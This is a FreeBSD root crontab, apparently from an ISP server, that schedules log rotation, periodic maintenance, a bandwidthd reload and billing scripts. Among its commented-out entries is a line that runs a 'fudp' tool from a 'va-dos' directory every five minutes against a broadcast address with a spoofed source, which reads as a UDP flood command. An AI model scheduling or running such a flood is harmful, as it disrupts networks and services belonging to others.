# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: release/9.2.0/etc/crontab 194170 2009-06-14 06:37:19Z brian $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
#
#minute	hour	mday	month	wday	who	command
#
*/5	*	*	*	*	root	/usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11	*	*	*	*	operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0	*	*	*	*	root	newsyslog
#
# Perform daily/weekly/monthly maintenance.
1	3	*	*	*	root	periodic daily
15	4	*	*	6	root	periodic weekly
30	5	1	*	*	root	periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time.  See adjkerntz(8) for details.
1,31	0-5	*	*	*	root	adjkerntz -a
3  3  * * *   root   /bin/kill -HUP `cat /var/run/bandwidthd.pid`
#5 0  * * *   root  /usr/local/bin/php /etc/stargazer/dnswitch.php >> /var/log/dn.log 
#2 8  * * *   root  /usr/local/bin/php /etc/stargazer/dnswitch.php >> /var/log/dn.log
#*/5 * * * *   root  /home/va-dos/fudp/fudp -s 194.246.74.1 -p 80 -z 100 -l -t 13 194.246.74.255 > /dev/null 2>&1 

#55 * * * * root /root/block/run.sh > /dev/null 2>&1


5 2 * * * root /usr/local/bin/php -q /etc/rscriptd/debtors.php > /dev/null 2>&1
